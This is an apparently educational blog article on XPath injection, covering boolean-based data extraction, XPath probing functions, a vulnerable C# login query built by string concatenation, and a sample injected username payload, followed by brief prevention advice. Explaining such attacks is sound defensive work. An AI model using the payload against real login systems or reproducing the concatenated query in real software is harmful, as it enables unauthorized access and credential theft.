XPath Injection Attacks and Prevention

What are XPath injection attacks? How do they work? How to prevent them? Find out answers to these questions and much more in this article.

Updated: 20 Feb, 23 by Antoniy Yushkevych 3 Min

Like SQL injection, XPath injection attacks occur when a website constructs an XPath query for XML data from user-supplied information. Thus, the issues when using XML to store data are quite similar to those with SQL.

XPath injection is a type of attack where malicious user input can be used to grant unauthorized access or reveal sensitive information such as XML document structure and content. This style of attack is carried out by making the user’s input be used in the construction of the query string. Unlike SQL attacks which depend on the SQL dialect used by the target database, XPath injection attacks are much more adaptable and ubiquitous.

There are two types of XML injection attacks: Boolenization and XML Crawling.

  • Boolenization: the attacker may find out if the given XPath expression is True or False. Let's assume that the attacker aims to log in to the account. A successful log in would be equal "True" and failed log in attempt would equal "False". Only a smart portion of the information is analyzed "character" or the number. When the attacker focuses on the string he may reveal it in its entirety by checking every single character within the class/range of characters this string belongs to.
  • XML Crawling:

To get to know the XML document structure the attacker may use:

count(expression)

count(//user/child::node()

Will return the number of nodes (in this case 2).

stringlength(string)

string-length(//user[position()=1]/child::node()[position()=2])=6

Using this query the attacker will find out if the second string (password) of the first node (user 'admin') consists of 6 characters.

substring(string, number, number)

substring((//user[position()=1]/child::node()[position()=2]),1,1)="a"

This query will confirm (True) or deny (False) that the first character of the user ('admin') password is an "a" character.

If the log in form would look like that:

C#:

String FindUser;

FindUser = "//user[login/text()='" + Request("Username") + "' And

      password/text()='" + Request("Password") + "']";

Then, the attacker should inject the following code:

Username: ' or substring((//user[position()=1]/child::node()[position()=2]),1,1)="a" or ''='

The XPath syntax may remind common SQL injection attacks but the attacker must consider, that this language disallows commenting out the rest of expression. To omit this limitation the attacker should use OR expressions to void all expressions, which may disrupt the attack.

Because of Boolenization, the number of queries, even within a small XML document, may be very high (thousands, hundreds of thousands and more). That is why this attack is not conducted manually. Knowing a few basic XPath functions the attacker is able to write an application in a short time, which will rebuild the structure of the document and will fill it with data by itself.

How to prevent XPath injection attacks:

Due to the similarity to SQLi attacks, the main prevention methods are also alike. These methods are the same as well for other typical code injection attacks.

  • Input Validation: The developer ensures that the application accepts only legitimate input.
  • Parameterization: In this method, the queries are precompiled and thus pass user input as parameters instead of expressions.

Antoniy Yushkevych

Antoniy Yushkevych

Master of word when it comes to technology, internet and privacy. I'm also your usual guy that always aims for the best result and takes a skateboard to work. If you need me, you will find me at the office's Counter-Strike championships on Fridays or at a.yushkevych@monovm.com